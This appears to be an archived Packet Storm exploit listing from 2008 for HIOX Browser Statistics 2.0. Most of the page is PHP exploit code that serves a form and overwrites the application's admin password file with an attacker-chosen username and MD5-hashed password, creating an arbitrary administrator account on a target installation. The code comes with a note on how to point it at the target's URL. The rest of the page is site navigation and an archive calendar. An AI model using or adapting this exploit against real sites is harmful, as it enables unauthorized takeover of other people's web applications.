exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

hiox-browseradd.txt

hiox-browseradd.txt
Posted Jul 31, 2008
Authored by Stack | Site v4-team.com

HIOX Browser Statistics version 2.0 add arbitrary administrative user exploit.

tags | exploit, arbitrary
SHA-256 | ca7461517554fb90d804f8d1c90ff8281324f74a2154060d9cf3ffc8c728621c

hiox-browseradd.txt

Change Mirror Download
<?php
@session_start();
?>
<table align=center width=72% height=95% ><tr><td>
<?php
/*
HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerability
[~] Discoverd & exploited by Stack
[~]Greeatz All Freaind
[~]Special thnx to Str0ke
[~] Name Script : HIOX Browser Statistics 2.0
[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip
You need to change http://localhost/path/ with the link of script it's very importent
*/
$creat = "true";
$iswrite = $_POST['createe'];
if($user=="" && $pass==""){
if($iswrite == "creatuser")
{
$usname = $_POST['usernam'];
$passwrd = md5($_POST['pword']);
if($usname != "" && $passwrd != ""){
$filee = "http://localhost/path/admin/passwo.php";
$file1 = file($filee);
$file = fopen($filee,'w');
fwrite($file, "<?php \n");
fwrite($file, "$");
fwrite($file, "user=\"$usname\";\n");
fwrite($file, "$");
fwrite($file, "pass=\"$passwrd\";");
fwrite($file, "\n?>");
fclose($file);
$creat = "false";
echo "<div align=center style='color: green;'><b>New User Created
<meta http-equiv=\"refresh\" content=\"2; url=http://localhost/path/admin/index.php\">
<br>Please Wait You will be Redirected to Login Page
</div>";
}
else{
echo "<div align=center style='color: red;'><b>Enter correct Username or Password </div>";
}
}
if($creat == "true"){
?>
<table align=center valign=center bgcolor=000000 align=center cellpadding=0 style="border: 1px #000000 solid;">
<tr width=400 height=20><td align=center bgcolor="000000"
style="color: ffffff; font-family: arial,verdana,san-serif; font-size:13px;">
Create New User </td></tr>
<tr width=400 height=20><td>
<form name=setf method=POST action=<?php echo $PHP_SELF;?>>
<table style="color:#ffffff; font-family: arial,verdana,san-serif; font-size:13px;">
<tr><td>User Name</td><td><input class="ta" name="usernam" type=text maxlength=20 >
</td></tr>
<tr><td>Password</td><td><input class="ta" name="pword" maxlength=20 type=password></td></tr>
<input name="createe" type=hidden value="creatuser"></td></tr>
<tr><td></td><td><input type=submit value="create"></td></tr>
</table>
</form>
</td></tr></table>
<?php
}
}else{
echo "<div align=center style='color: red;'><b>User Already Exist</div>";
}
?>
</td></tr></table>

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close